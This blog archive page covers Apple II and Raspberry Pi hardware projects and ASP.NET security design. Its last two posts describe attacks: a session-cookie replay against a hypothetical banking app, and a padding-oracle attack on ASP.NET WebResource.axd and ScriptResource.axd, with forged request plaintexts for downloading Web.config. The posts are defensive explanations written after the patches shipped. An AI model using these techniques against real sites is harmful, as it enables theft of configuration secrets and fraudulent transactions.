Explorations with Low-Powered Devices for the Apple IIe/IIgs

I recently posted my experiences with using a Bluetooth module to perform wireless ADTPro transfers with my Apple IIe.  At that time, I was powering the Bluetooth module from an AC adapter.

Seeing that the Bluetooth module power adapter was a standard +5v USB power adapter, I suggested a simple Apple II  peripheral card with a USB female port to provide the +5v power needed by these modules or devices.  +5v is readily available from pin 25 on the slot connectors (maximum of 500mA for all peripheral cards according to documentation).  A few minutes with the soldering iron came up with this contraption:

AppleII-USB-5v-1 AppleII-USB-5v-2

It surely was a product of an amateur, but it was enough for a proof-of-concept so that I could put the Bluetooth module inside the Apple IIe without an additional power line coming out of the case.  And with that, I was again performing wireless ADTPro transfers from my laptop using Bluetooth.

AppleII-USB-5v-SerialBluetooth

One thing to note about this Bluetooth module is that the serial port speed is set to 9600 baud by default.  The recent versions of ADTPro have removed support for 9600 baud.  You’ll have to follow the instructions for the Bluetooth module to configure it to start up at 115k baud.  115k is faster anyway, and the serial transfer speed is still slower than the Bluetooth transfer speed (meaning that it’s still the serial segment that’s the slower part of an end-to-end transfer).

Moving to the IIgs, I pulled out from my stash of devices a tiny Wi-Fi bridge IOGear GWU627.  This acts as a standard Wi-Fi bridge (802.11b, 802.11g, or 802.11n), except that it is very tiny and can be powered by a standard USB power adapter.  I put an Uthernet card in slot 2, my homemade USB peripheral card in slot 3, and wired them altogether with the GWU627 bridge also inside the IIgs case.

IOGEAR-GWU627-1 AppleII-USB-5v-Uthernet-1

With a standard Marinetti installation, my IIgs is now wirelessly connected to my home network.  DHCP works over the wireless bridge, and the IIgs receives an IP address from the home router.  The Marinetti applications Casper web server and Telnet client work as they should.  This could be a good way to run a 24×7 web server from your IIgs and make it available to the Internet – of course, only with the proper port-forwarding rules in your home router and only if your ISP allows hosting a web server and does not block port 80 incoming to your network.

AppleII-USB-5v-Uthernet-2 AppleII-USB-5v-Uthernet-3

Posted in Retrocomputing | Tagged | Leave a comment

Adding Wireless (Bluetooth) Support in ADTPro

It’s been months since I planned to look into adding Bluetooth support in David Schmidt’s fabulous ADTPro software.  I’ve been using ADTPro for years to transfer disk images for use in my Apple IIe using the Apple II Super Serial Card.  Over the years, it has garnered many additional features, such as providing a virtual drive over the wires.

My Windows (8.1 x64) laptop does not have a built-in RS-232 serial port, so I normally use a cheap (~$15) USB-serial cable. One that works for my laptop, because of its Prolific PL-2303 chipset, is the Startech ICUSB232DB25.  Coupled with a null modem adapter, I can use ADTPro to its maximum 115kbps transfer speed.

A few months ago, I wanted to see if I could do away with the physical serial cable.  This was about 20 months ago (I checked on when I ordered the Bluetooth-Serial board and saw an invoice for August 2012).  These Bluetooth-Serial boards come around to each cost about $20.  It’s probably cheaper if you’re willing to just get the Bluetooth-Serial module and wire them directly to the SSC data and power connectors.  However, this was just a proof-of-concept, so my setup looked like the following:

SuperSerialCardII BolutekBlutetoothModule

The Bluetooth-Serial board uses the Bolutek BLK-MD-BC04-B module (pictured on the lower right of the board).  It attaches to the SSC with a straight-through DB9-DB25 adapter, and uses the USB cable for the standard 5v power source.

Alas, at that time, my tests showed that although I can get wireless remote access to the Apple IIe, ADTPro did not fare as well.  Remote access is through Apple’s PR#2 and IN#2 commands and through Windows’ HyperTerminal program.  Everything seems to work properly on the Apple IIe end, but ADTPro’s use of COM ports exposed by the Bluetooth serial SPP services did not work for me (actually, it’s the rxtx library’s use of the COM ports – ADTPro just uses rxtx for serial port support).

I hatched a plan to update ADTPro to accommodate this.  After more than a year of getting de-prioritized, it finally got its due attention.  Starting a few days ago, I’ve finally got something like an alpha version of Bluetooth support working in ADTPro, tested only in Windows.

On the Windows end, any Bluetooth-enabled machine should work using the standard Windows Bluetooth drivers.  WIDCOMM-based Bluetooth controllers should also work.  I first had to pair my laptop with the Bolutek module.  Pairing is straightforward.  Having the Bolutek module in its regular slave-mode setting, it appears when I search for additional Bluetooth devices in my laptop, and the default pairing code is 1-2-3-4.  Once paired, you’ll see that it provides the standard Bluetooth Serial Port Profile (SPP) and creates the virtual COM ports (COM17 and COM18 in my setup).

ADTProBluetooth-1

ADTProBluetooth-2 ADTProBluetooth-3

I put on my software developer hat, and dived into the ADTPro source code within the Eclipse IDE.  David has really gotten the components cleanly modularized, and I only had to create a few classes to add the Bluetooth support.  Once built, Bluetooth is just an additional transport in the ADTPro runtime environment.

ADTProBluetooth-4 ADTProBluetooth-5

The Bluetooth connection is made directly to the SPP service, and not through the virtual COM ports.  Once connected, the standard serial port client on the Apple IIe can send and receive disk images wirelessly over Bluetooth.

ADTProBluetooth-6

It was enough for a proof-of-concept, and I’ll check with David on merging this upstream to ADTPro.  As with any proof-of-concept code, there’s some cleanup work to do.  Like displaying the friendly names, instead of the addresses, of the Bluetooth devices.

Also, on the Apple IIe end, I could probably splice the power wire for the Bluetooth-Serial board and get the +5v directly from the Apple IIe motherboard.  With the inexpensive prototype boards selling around the net, I am also thinking of a generic USB power source slot card like this:

AppleUSBPowerProject

It’s probably just a two-wire setup.  I’m just not motivated enough to look for my soldering iron buried somewhere in the garage for the moment.  If anyone (Bradley?) wants to mass market such a board, I’m one of your potential buyers.

Update 5/16/2014:

I tried my ADTPro build on another machine.  This time, I first tried using the virtual COM ports using the ADTPro Serial transport, and SURPRISINGLY, it works.  There may have been some changes in the rxtx library since 20 months ago, but I remember not getting it to work back then.

The serial port enumeration takes a while with these virtual COM ports, and it might seem like ADTPro is hanging, but just patiently wait for the dialog box to eventually come up, connect to the outgoing virtual COM port, and ADTPro works as it should.  Note that the baud rate you want to set on the ADTPro client is the baud rate of the communication from the Apple IIe to the Bluetooth board, not the baud rate from ADTPro to the virtual COM port.

So there. With other, maybe most, Windows machines or the proper Bluetooth stack, ADTPro correctly works using the rxtx library over the virtual COM ports exposed by the Bluetooth connection.  There’s no need for my ADTPro modifications (which I’ll just use in a separate follow-up project).

Posted in Retrocomputing | Tagged , , | 4 Comments

Updating my cable setup with the Raspberry Pi

I’ve delayed looking into the Raspberry Pi for quite some time now.  I’ve known how awesome it is, but also know that I didn’t have a lot of time to tinker around with it.  However, recent developments in late 2013 convinced me that I needed to spend time with this tiny computer.  Since the past holiday season up to today, I have bought two Raspberry Pis, each with an enclosure, all the nifty tiny USB hardware that extends its functionality, and even a real-time-clock extension attaching to the GPIO pins.

The things that convinced me to look into it are the developments related to cable TV (i.e., Comcast, Time Warner, FIOS).  There’s this cable tuner, called HD Homerun Prime, that you can purchase through the retail market.  Like TiVo devices, it takes in a CableCARD and attaches to your home router.  Cable providers are required by law to allow you to request a CableCARD if you have a subscription with them.  It’s normally free for one CableCARD, or sometimes they charge a minimal fee for it like $1/month.

With this CableCARD and the HD Homerun Prime, your cable tuners (3 in the HD Homerun Prime) are made available to your home network through DLNA/UPnP.  HD Homerun Prime had this UPnP capability made available in its firmware in late 2013.

We have a room in our house that doesn’t have a cable outlet.  Coincidentally, we have a combo TV/DVD there.  The only way we could get cable into that TV was by using a low-tech A/V sender/receiver that uses some RF frequency – the one that is highly susceptible to microwave signals (that is, the A/V signal craps out when the microwave is in use).

In 2013, the media center usage for Raspberry Pi took a dramatic upturn.  First, they made available a per-unit license for MPEG2 decoding for a low price of £2 (about $4).  A lot of cable providers encode their streams as MPEG2 (whilst I think most dish providers use MPEG4).  Another development was that they enabled CEC capability in the HDMI socket on the Raspberry Pi.  With that, the media center distributions for Raspberry Pi, like RaspBMC and OpenElec, provided all that I needed to switch over to a full UPnP solution to my isolated TV.

I installed the OpenElec distribution image.  It’s smaller and customized for a lean media center so a lot of software packages are not present.  But that’s why I bought another Pi just for general-purpose tinkering and relegated the first Pi for my isolated TV.  OpenElec can easily fit in an SD card with a small capacity.  I used a 2GB SD card.  I attached a nano-sized WiFi USB dongle (150Mbps), temporarily attached a USB keyboard/mouse, and connected the HDMI port to our main TV for testing.

OpenElec boots directly into XBMC.  There are several XBMC skins out there to customize its appearance, but I just stuck with the standard out-of-the-box skin “Confluence”.  First thing I noticed is that the HD Homerun Prime is detected as a UPnP source.  So I added the Favorites subfolder as an XBMC video source.  I’ve pre-selected the channels that would appear in the HD Homerun Prime Favorites subfolder through the small web interface exposed by the HD Homerun Prime, the same web interface where you can read the codes off when you set it up with your cable provider over the phone with their tech support.  I set up the Favorites so I could see a list of channels shorter than the full list of channels available to me.  Who watches those home shopping channels anyway?

The Raspberry Pi feature that caught me by surprise is the CEC capability.  With CEC, I actually didn’t even need a temporary USB/mouse keyboard to set up OpenElec. The cursor movement buttons on most modern TV remotes are received by the TV infrared receiver, and passed through the HDMI cable using this CEC feature.  The other device at the end of the HDMI cable, which is the Raspberry Pi, receives the cursor movement and uses that to navigate the XBMC interface.

One hiccup was that when I moved over the setup to the isolated TV, I found that my small TV/DVD device didn’t have the CEC feature.  It was a no-brand small 22” LCD TV, and from what I’ve read, some older smaller TVs do not have CEC.  So what’s available as a remote control for OpenElec/XBMC?  I didn’t want a full keyboard/mouse because it felt too geeky.

First, I tried Bluetooth and it worked.  I had a tiny Bluetooth USB dongle which the Pi readily recognized.  From OpenElec’s Bluetooth setting, I was able to pair an extra Wiimote controller that we have.  I tried pairing a no-name Wiimote clone, but it would only recognize the four cursor keys.  With an original Nintendo Wiimote, it was able to recognize the cursor keys, Enter and Cancel keys, and even the volume keys.  So that would have worked, but using a Wiimote still felt geeky.

I read that certain inexpensive RF remote controls (the ATI All-in-wonder remotes) would work, and it won’t cost more than $15;  I also read that most media center IR remotes would work and are actually less expensive.  In the end, I decided I want to use the existing remote control from that no-brand TV.  I ended up buying Flirc, sort of a universal learning IR receiver.  The Raspberry Pi easily recognized the Flirc dongle, and I was able to program/teach the dongle with the TV remove using the Windows application available from their site.  Very easily too.  I had to pick a remote button that the TV would not recognize.  I picked the “Guide” button and had it mapped to sending a “Ctrl-Home” keyboard equivalent to the Raspberry Pi.  In the Raspberry Pi XBMC layout (I had to use SSH or the command-line to do this), I added a mapping in the keyboard layout to make Ctrl-Home bring up the mapped HD Homerun Prime Favorites source.  What this accomplished was that the “Guide” button on the remote served as a go-back-to-the-top-level-menu command, then with the arrow keys in the remote, you can scroll through and select from your favorite channels.

With the UPnP streaming, I could even access my cable (each of the 3 tuners will be reserved as it is accessed) channels through UPnP players on any of our phones, tablets, or computers.  For Windows, you can easily see the HD Homerun Prime as a UPnP device and browse through the Favorites folder (it plays the cable channel in Media Player).  For Android devices, I use the combination of Skifta and WonderPlayer.

I opted to use the SD channels because it was using the wireless network.  I heard that HD channels, although possible, could put a strain in your wireless network.  Streaming HD channels to the Pi should not be an issue over a wired network though.  Also, I’ve yet to set up a new 802.11ac router to see if it provides enough bandwidth to switch over to using HD for my setup.

I’m now ready to return my cable box to my cable provider, and save on that $10-something they charge me monthly for it.  I will miss the DVR capability right now (also an additional $10-something per month that they charge), but also had set up a small Windows media center box to be my DVR.  I’ve yet to see if I can configure Windows and/or the motherboard to allow the media center to sleep/wake on-demand without the need to use some Wake-On-Lan software to explicitly wake it up.  I’ve tested it with WOL, but I really want it to automatically wake when something else in the home network makes a request to any of its services.  Having that media center setup also means that I could make it host the electronic program guide that can be accessed by my isolated TV.  But that media center setup is another story.

If only the HD Homerun Prime had an additional HDMI socket to directly connect one of the TVs that sit close to it.  But I’m not complaining.

Posted in Around the House | Leave a comment

Video options for the Apple IIgs

I’ve always abhorred CRT monitors.  They’re bulky, heavy, and they probably emit too much radiation to tire your eyes too quickly.  I’m so thankful that the computer industry, and every other video-related industry has switched over to using LCDs.

Retrocomputing is a hobby of mine.  The Apple IIgs is what I use the most from my collection of vintage computers.  The Apple IIgs made use of an RGB monitor through a DB-15 connector at the back of the computer.  A few years ago, Roger Johnstone provided the schematics to an RGB-SCART cable.  With some LCD monitors having a SCART input, this allowed me to finally get rid of my RGB monitor.  I use a Samsung 730MW monitor and that provides a very clear output from my Apple IIgs.

These LCD monitors with SCART input could start getting harder to find in the upcoming years.  I wanted to look at alternatives to displaying my Apple IIgs output on modern monitors.  It’s been an often-discussed topic in the vintage computer forums.  Ideally, we’d like to be able to use VGA, DVI, or even HDMI-capable monitors (composite-based output would be insufficient for me). For several years, Roger’s SCART cable was the only inexpensive way to do this.  There was a more expensive XRGB/XRGB2 converter that provided good output quality, but that turns out to be more expensive than your standard Apple IIgs investment.

As recent as last year, Nishida Radio from Japan offered an RGB-Component converter.  I recently purchased the converter from him and got a chance to test it over the holidays.  Although I wouldn’t call the output equivalent to that on the SCART cable, it’s pretty darn close.  Look for yourself in the following photos I’ve taken.  My monitor has both a SCART connector and a Component-In connector.

P1040235P1040238

P1040245P1040239

The ones on the left use the SCART cable and the ones on the right use Nishida’s RGB-Component adapter.

Nishida also has some other components for use with vintage computers.  My other purchases include the UNISDISK which emulates a Unidisk drive (attaches to the DB-19 drive connector at the back of the Apple IIgs), and a VGA adapter for the Apple IIc.  See all his stuff here.

Posted in Retrocomputing | 4 Comments

Out-of-band Authorization

A lot of applications require the need for an in-session authorization mechanism. This means that when an end-user is within an authenticated session, the end-user will be prompted to enter a set of credentials before he can be allowed to perform specific transactions. These transactions are identified as high-risk transactions, such as changing a password or changing a registered e-mail address. The set of requested credentials could be the same set used to sign-in to the application (which is confusingly often mislabeled as re-authentication), or it could be a different set of credentials specific for the transaction that is being requested.

Almost all the time, this in-session authorization mechanism is desired to be delivered or performed out-of-band. That is, the secondary credentials are either sent out to a delivery channel different from where the transaction was initiated, or the secondary credentials are entered in a delivery channel different from where the transaction was initiated.

I’m specifically addressing the general concept of authorization, instead of the more specific concept of authentication. In the context of using an out-of-band mechanism for authorization, if we identify that high-risk transaction to be the “signing-in” transaction, then the mechanism leads to what is known in the industry as multi-factor authentication.

Multi-factor authentication (MFA) is available in a lot of applications. However, being a specialization of the more general concept of out-of-band authorization (OOBA), there are scenarios that MFA do not take into account during application design. These scenarios, if not accounted for, often lead to an insecure implementation of a general OOBA mechanism.

High-risk Transaction Identification

The first step in an OOBA mechanism is to identify if a transaction is a high-risk transaction. Most of the time, just the transaction name itself is enough to identify it as high-risk. An example is the password change transaction.

There are times where identification depends on the payload of the transaction request. An example would be an ATM withdrawal where withdrawing less than a certain threshold is not considered high-risk, and withdrawing above that threshold is considered high-risk. In this case, the transaction request has to be inspected to determine whether it is high-risk or not. This has implications on application design because the application cannot prompt for secondary credentials before the user has even entered the transaction request details.

Transaction and Authorization Context

An important part of OOBA is the association of the authorization context with that of the transaction context. Before a transaction is allowed to go through, the authorization context associated with the transaction should be verified. It is not enough to verify just any authorization context; it has to be the authorization context associated with the transaction.

If the authorization context is verified in a separate operation than that of the transaction, it is very important that the context association be maintained. That is, it is not enough to ask a verification service, “Are these the correct credentials?” We have to ask the verification service, “Are these the correct credentials for this particular transaction request?”

In a web application, in order for the context association to be maintained, the transaction request and the secondary credentials should be sent in a single HTTP request. Technically, separate HTTP requests could be used, but would require a mechanism of associating the separate HTTP requests with each other.

Design Notes

Web Forms

Out-of-band authorization can be implemented in web forms through a user control embedded in the form. The OOBA user control visibility can be toggled depending on the position of a transaction within a workflow. For the most common type of OOBA, the user control merely provides entry fields where OOBA secondary credentials are entered.

Server-side validation of the transaction request and the OOBA credentials occur within a single HTTP request before the transaction is completed.

authzValidationNeeded = … depending on the transaction request payload …
if (authzValidationNeeded)
    authzCredentials = … retrieved from form fields …
    if Empty(authzCrendentials) || !Validate(authzCredentials)
    then
        return an authz error,
        allow the user to re-enter credentials,
        and resubmit transaction and credentials

Because of the importance of associating the authorization context with the transaction, the authorization context should not be validated in a separate earlier step (in a separate earlier HTTP request) than that of the transaction itself.

MVC Forms

The authorization token follows the same mechanism used in the built-in MVC AntiForgery mechanism; passed to the server as a separate form field. It differs only in that the token value is not generated at the time the view is generated. The token value is requested from the user by making the form field visible and having the user input the value.

Server-side validation of the transaction request is the same as that in Web Forms.

WCF Ajax Services

WCF Ajax services pose an implementation challenge because in a general architectural design, we want to separate the concerns of authorization with that of the transaction. If we require the transaction interface to be modified to accommodate the authorization credentials, like:

FooResponse FooOperation(FooRequest request, AuthorizationCredentials credentials)

Then authorization concerns interfere with the clean operation interface of the transaction.

Since it is desired to pass the authorization credentials in the same HTTP request as that of the transaction, the only other place we can pass them are through the HTTP headers.

Server-side validation of the transaction request and the OOBA credentials occur within a single HTTP request before the transaction is completed.

authzValidationNeeded = … depending on the transaction request payload …
if (authzValidationNeeded)
    authzCredentials = … retrieved from HTTP header …
    if Empty(authzCrendentials) || !Validate(authzCredentials)
    then
        return an authz error,
        allow the user to re-enter credentials,
        and resubmit transaction and credentials

On the client side, the transaction invocation is conventionally done through JavaScript. The invocation would originally look like:

IFooService.FooOperation(fooRequest,
    Function.createDelegate(this, this.onFooOperationSuccess),
    Function.createDelegate(this, this.onFooOperationFailure),
    fooContext);

If identified as a high-risk transaction, the invocation should be changed to present the authorization credentials form, and invoke the service operation after the credentials have been entered, like:

authzWidget.show(this, fooRequest, fooContext,
    function (that, request, context, credentials) {
        IFooService.FooOperation(request,
            Function.createDelegate(that, that.onFooOperationSuccess),
            Function.createDelegate(that, that.onFooOperationFailure),
            {
                context: context,
                credentials : credentials
            });
    });

Or like (using jQuery’s proxy instead of Microsoft Ajax’s delegate):

authzWidget.show(this, fooRequest, fooContext,
    function (that, request, context, credentials) {
        IFooService.FooOperation(request,
            $.proxy(that.onFooOperationSuccess, that),
            $.proxy(that.onFooOperationFailure, that),
            {
                context: context,
                credentials : credentials
            });
    });

The Microsoft Ajax WebRequestManager is modified to check for the presence of the credentials in the invocation context and send that as part of the HTTP headers.

Sys.Net.WebRequestManager.add_invokingRequest(function (sender, eventArgs) {
    var webRequest = eventArgs.get_webRequest();
    var userContext = webRequest.get_userContext();
    if (typeof userContext == "object" && userContext.credentials) {
        var headers = webRequest.get_headers();
        headers["X-RequestAuthorizationToken"] = userContext.credentials;
    }
});

Additional Notes

Slightly related to the implementation design above, let me explain my claim that authentication is an extension to authorization. Authorization is the core process. I understand that this is highly controversial. I’ll start by qualifying that there are two kinds of authorization — an authenticated authorization and an unauthenticated authorization. Most developers are familiar with the former wherein the identity of the caller is part of the context used to determine whether or not a transaction is authorized. What about an unauthenticated authorization? What is it and when is it used?

An unauthenticated authorization is when there is no separate identity context that can be used to determine authorization. Only the information or credentials that are included in the authorization request are used to determine authorization. What transaction would use such an unauthenticated authorization? It would be THE transaction that creates the identity context. In short, the sign-in transaction.

Think of that. In the most common case, an end-user provides a username and password to authorize the creation of an identity context. That identity context is usually a token or cookie that is passed around during the lifetime of a session to perform additional authenticated authorizations. Extending this concept further to MFA, MFA is just a means of aggregating multiple unauthenticated authorizations with the end result of “signing-in” and creating an identity context.

What about the term “re-authentication”? Re-authentication is when the identity context needs to be re-established, perhaps because it was lost, it expired, or it was explicitly revoked. Re-authentication can use the same means as the sign-in process — username/password, MFA, etc. Until the end-user re-authenticates, he doesn’t have an identity context and cannot perform any authenticated authorizations.

A “password reset” flow is just another channel to perform an unauthenticated authorization to establish an identity context; of course, once the identity context has been established, the system enforces the end-user to provide a new password to the system.

End-users sometimes confuse re-authentication with general authorization. This is because some applications request the same set of credentials as those used to sign-in. It is not, however, re-authentication, because the existing identity context remains valid. Take for example the popular eBay web site. You sign-in to establish an identity context. Within the application, if you want to edit your account information, you are prompted again for username/password. You can cancel that transaction (editing your account information), back out, and your original identity context is still valid as you move somewhere else in the application. What it was trying to do was perform an authorization on the transaction to edit account information, but not actually to re-authenticate. It just so happens that the authorization process asked for username/password. The authorization process could have used a different mechanism, such as challenge questions/answers, or an out-of-band mechanism like SecurID.

Posted in ASP.NET | Leave a comment

ASP.NET Session and Forms Authentication

The title can be misleading, because in concept, one is not related to the other.  However, a lot of web applications mix them up, causing bugs that are hard to troubleshoot, and, at worst, causing security vulnerabilities.

A little bit of background on each one.  ASP.NET sessions are used to keep track and keep information related to a “user” session.  When a web server is initially accessed by a browser, the server generates a unique session ID, and sends that session ID to the browser as the value of a cookie (the name of the cookie is ASP.NET_SessionId).  Along with that session ID, a dictionary of objects on the server, often referred to as session state, is allocated corresponding to that session ID.  This dictionary can be used to keep track of information unique to that session.  For example, it could be used to keep track of items placed in a shopping cart metaphor.

Note that this “session” can exist even if the user has not authenticated.  And this is often useful.  In a retail web site (like Amazon), you can put items in your shopping cart, and only need to authenticate or sign on when you are ready to checkout — and even then, you can actually make a purchase without needing to authenticate, provided, of course, that a valid credit card is used.

Because this “session” is disjoint from authentication, it is better referred to as a “browser” session instead of as a “user” session.  In a kiosk environment, if a user walks away from the kiosk while there are items in a shopping cart, the next user to use the kiosk will still see the same shopping cart.  The web server doesn’t know any better that a different user is using the kiosk, because the same session ID is being sent back in the session cookie during interaction with the web server.

That dictionary of objects on the server, the session state, also poses certain complications that most developers are aware of.  In a web farm, some form of sticky load balancer has to be used so that session state can be kept in memory.  Or a centralized store for the session state is used to make the state consistent across the servers in the web farm.  In either case, service performance can be affected.  I have a very strong opinion against using session state.  I avoid it, if at all possible.

What about Forms Authentication?  Forms Authentication is the most common authentication mechanism for ASP.NET web sites.  When a user is authenticated, most commonly using a user ID and password, a Forms Authentication cookie is generated and is sent to the browser (the name of the cookie, by default, is .ASPXAUTH).  The cookie contains the encrypted form of an authentication ticket that contains, among other things, the user ID that uniquely identifies the user.  The same cookie is sent to the web server on each HTTP request, so the web server has an idea of the user identity to correlate to a particular HTTP request.

Everything I mentioned above is common knowledge for web developers.  Trouble and confusion only comes about when an expectation is made that an ASP.NET session can be associated with ASP.NET authentication.  To be clear, it can be done, but precautionary measures have to be taken.

The problem is related to session hijacking, but better known as session fixation.  Assuming that you’ve done your diligence of using SSL/TLS and HttpOnly cookies, there isn’t a big risk of having the session ID stolen/hijacked by sniffing the network.  And most applications also perform some session cleanup when the user logs out.  Some applications even ensure that a new session ID is created when the user logs in, thinking that this is enough to correlate a session state with a user identity.

Remember that the session cookie and the forms authentication cookie are two different cookies.  If the two are not synchronized, the web server could potentially allow or disallow some operations incorrectly.

Here’s a hypothetical (albeit unrealistic) scenario.  A banking application puts a savings account balance into session state once the user logs in.  Perhaps it is computationally expensive to obtain the account balance, so to improve performance, it is kept at session state.  The application ensures that a new session ID is created after the user logs in and clears the session state when the user logs out.  This prevents the occurrence of one user reusing the session state of another user.  Does it really prevent it?  No.

As an end-user having control of my browser, I am privy to the traffic/data that the browser receives.  With the appropriate tools like Fiddler2 or Firebug, I can see the session and forms authentication cookies.  I may not be able to tamper them (i.e., the forms authentication cookie is encrypted and hashed to prevent tampering), but I could still capture them and store them for a subsequent replay attack.

In the hypothetical banking application above, I initially log in and get SessionIDCookie1 and FormsAuthCookie1.  Let’s say the account balance stored in session state corresponding to SessionIDCookie1 is $100.  I don’t log out, but open up another window/tab and somehow prevent (through Fiddler2 maybe) the cookies from being sent through the second window.  I log in to that second window.  The web server, noting that the request from the second window has no cookies, starts off another session state, and also returns SessionIDCookie2 and FormsAuthCookie2.  Browsers usually overwrite cookies with the same names, so my SessionCookieID2 and FormsAuthCookie2 are my new session ID and forms authentication cookies.  But remember that I captured SessionIDCookie1 and FormsAuthCookie1 to use in a future attack.

In that second window, I transfer $80 away from my account, thereby updating the session state corresponding to SessionIDCookie2 to be $20.  I cannot make another $80 transfer in the second window because I do not have sufficient funds.

Note that SessionIDCookie1 has not been cleaned up and there is a session state on the server corresponding to SessionIDCookie1 which still thinks that the account balance is $100.  I now perform my replay attack, sending to the web server SessionIDCookie1 and FormsAuthCookie1.  For that given session state, I can make another $80 transfer away from my account.

You might say that the application could easily keep track of the forms authentication cookie issued for a particular user, so that when FormsAuthCookie2 is issued, FormsAuthCookie1 becomes invalid and will be rejected by the server.  But what if I use SessionIDCookie1 and FormsAuthCookie2 on the second window?  It’s the same result — I can make another $80 transfer away from my account.

Oh, you might say that the application should invalidate SessionIDCookie1 when SessionIDCookie2 is issued.  Sure, but how?  Unlike the forms authentication cookies, where the user identity is the same within both cookies, there is nothing common between SessionIDCookie1 and SessionIDCookie2.  And since there is nothing relating SessionIDCookies with FormsAuthCookies, there’s no mechanism to search for and invalidate SessionIDCookie1.

The only workaround for this is custom code that ties a SessionIDCookie with the FormsAuthCookie that was issued for the same logical session.  One of the following options should provide a solution.

  • Key your session states by an authenticated user ID instead of by a session ID.  No need for the session cookie.  This will not work for applications that need to keep track of session without authentication (e.g., online shopping).
  • Store the session ID as part of the payload for the forms authentication cookie.  Verify that the session ID in the session cookie is the same as that stored in the forms authentication cookie.  Keep track of the forms authentication issued for each user so that only a single forms authentication cookie (the most recently issued) is valid for the same user.

Maybe an overarching solution is to avoid storing user-specific information in the session state.  Remember that it is a “browser” session state, and has nothing to do with an authenticated user.  If you keep that in mind and only store “browser”-related information into session state, then you could avoid the problems altogether.

ASP.NET session fixation is not a very publicized problem, but is potentially a big risk, specially if improper assumptions are made with regard to session and authentication.  ASP.NET session fixation is also described long back in http://software-security.sans.org/blog/2009/06/14/session-attacks-and-aspnet-part-1/, and been reported through Microsoft Connect http://connect.microsoft.com/feedback/viewfeedback.aspx?FeedbackID=143361, but to my knowledge, has not been addressed within the ASP.NET framework itself.

Posted in ASP.NET | Tagged | 9 Comments

Yet Another Take on the Padding Oracle Exploit Against ASP.NET

Or an example Padding Oracle attack in 100 lines of C# code.

This post has been in my outbox for weeks, since I did not want to make it generally available before the patches were released.  Now that the patches are being pushed on Windows Update, and I also see that there are a couple of blog entries already providing the same details, I hope that making the source available would help developers understand how the exploit worked.

There’s been several web postings citing the vulnerability of ASP.NET, but few have tried to explain it.  Here’s my attempt to simplify it for you, dear reader, complete with C# code to perform the exploit on a padding oracle.  There are two kinds of attacks that I’ll be describing – the easier one is a decrypting attack, where the plaintext for encrypted data is obtained, and the more difficult one is an encrypting attack (where a forged encrypted request is sent).

None of the information I present here is secret, and all the steps can be obtained by thoroughly understanding the public documents describing how an exploit is performed.  None of the documents I’ve read specifically exploits ASP.NET, but coupled with knowledge on how ASP.NET works (Reflector helps a lot), an exploit program can easily be crafted.  The first and second documents are practically the same.  The third document describes the attack in more practical terms.

Contrary to what’s inferred in several blog posts, none of the papers successfully describe an encryption attack on ASP.NET.  Rizzo’s paper offers hints to how we can perform an encryption attack (not easy), but given enough time and HTTP requests by the attacker, it can be done.  I’ll describe the special case where the attacker can download any file from certain ASP.NET web sites using an encryption attack.  Update 10/13/2010: The PadBuster application in the third site above has been updated to use an encryption attack.

There are two padding oracles that I’m aware of in ASP.NET, there may be more.  The first oracle is the WebResource.axd handler.  It throws an HTTP 500 error if a padding error is encountered and either HTTP 200 or HTTP 404 if there isn’t a padding error.  The other one is ViewState decryption, but I did not investigate further on the second one, and most sites do not encrypt view state – that is, they just don’t place sensitive information in the view state and avoid the encryption/decryption.  Contrary to what’s been mentioned out in the net, the ScriptResource.axd handler is not a padding oracle.  The code for ScriptResource catches a padding error and returns an HTTP 404 in its place.  The ScriptResource handler, however, is what’s exploited in attempting to download any file from the web site.

The first fix has to be on the WebResource handler, to make it behave the same way as the ScriptResource handler (that is, catching the padding exception and returning an HTTP 404).  The processing code for ViewState may need to be fixed as well (like I mentioned, I didn’t explore the ViewState attack vector).  I will also make the assumption that the encrypting method is known (and the attacker knows what the cipher block size is).  This is typically 3DES or AES, but it’s just an additional step to check if the attack works for one or the other.

Finding The WebResource Padding Oracle.

First is to find an existing ciphertext for a request to the WebResource handler.  Inspection of the generated HTML page from an ASP.NET application can easily find this.  Even the simplest ASP.NET application will include a WebResource request to the embedded “WebForms.js” resource.  The decrypted form of that request parameter is “s|WebForms.js”.  It doesn’t have to be that specific request – any WebResource request will do, because we know that it’s a valid request to the ASP.NET application.

Performing The Decryption Attack.

With a known valid ciphertext, we use that ciphertext as the prefix blocks for a padding oracle exploit.  I won’t go into detail into the mathematical aspects of this (it’s all described in the papers).  Suffice to say that we perform a padding oracle decryption attack by sending several “known ciphertext” + “garbled block” + “ciphertext block” to the server.  Decrypting a single ciphertext block will take at most n*256 requests, where n is the number of bytes in a block.  For 3DES-based encryption, that’s a small 2000 requests per block.

Performing The Encryption Attack.

The papers and the “padBuster” utility available for download around the net assumes that the initialization vector (IV) is controllable by the attacker.  It may be true on some systems, but not on the other flaw with ASP.NET (described next).

There is this big vulnerability in one of the HTTP handlers that came out with ASP.NET 3.5.  Specifically, the ScriptResource.axd handler allows download of any file within your application directory.  But only if an attacker can figure out what the encryption key to use in encrypting the download request.  Assuming an attacker can find what the encryption key is, what would the plaintext look like?  A plaintext request for a file in the application directory looks like one of these:

r|~/Web.config

R|~/Web.config

Q|~/Web.config

q|~/Web.config

The different prefixes indicate different variations of the request (whether the downloaded stream should be gzip’ed and such).  The path could also be an absolute path instead of an application-relative path.

If the attacker does not have the encryption key, and the IV is the prefix of a request to ScriptResource, then it’s easy for an attacker to craft such a request by first performing a decrypting padding oracle attack for the last block of the request against an existing ciphertext block.  Given the intermediary bytes for the last block, the ciphertext block for the second-to-the-last block is derived, and another decrypting attack is made on it.  The chain is followed until the first block, where the IV is derived and the IV sent as a prefix.  This would only involve about 4000 requests to the padding oracle since the length of the desired attack request is only two 3DES blocks (or one AES block).

That’s only if the IV were sent as the prefix to the encrypted block.  It isn’t.  Not for the ScriptResource handler.

However, there’s this other flaw.  If the victim web site makes a certain usage of the ScriptResource handler, the source of the HTML page would have a request (encrypted) that is similar to one of the attack request.  This is with the use of CompositeScripts in the ScriptManager.  With the use of CompositeScripts containing a script reference to a JavaScript file, the encrypted request starts with “Q|…”.  If the attacker can find out that CompositeScripts are used in a page (by using the padding oracle to decrypt the first block of a ScriptResource request and checking if it starts with “Q|”), then that request can be used as a prefix to an attack request.

Specifically, the attack request will be composed of: “prefix” + “garbled block” + “||~/Web.config”.

Because of how the ScriptResource handler processes the request, the garbled block could be ignored and the subsequent part of the request for the file download is honored.  This causes the attack to append the contents of the requested file into the rest of the results.

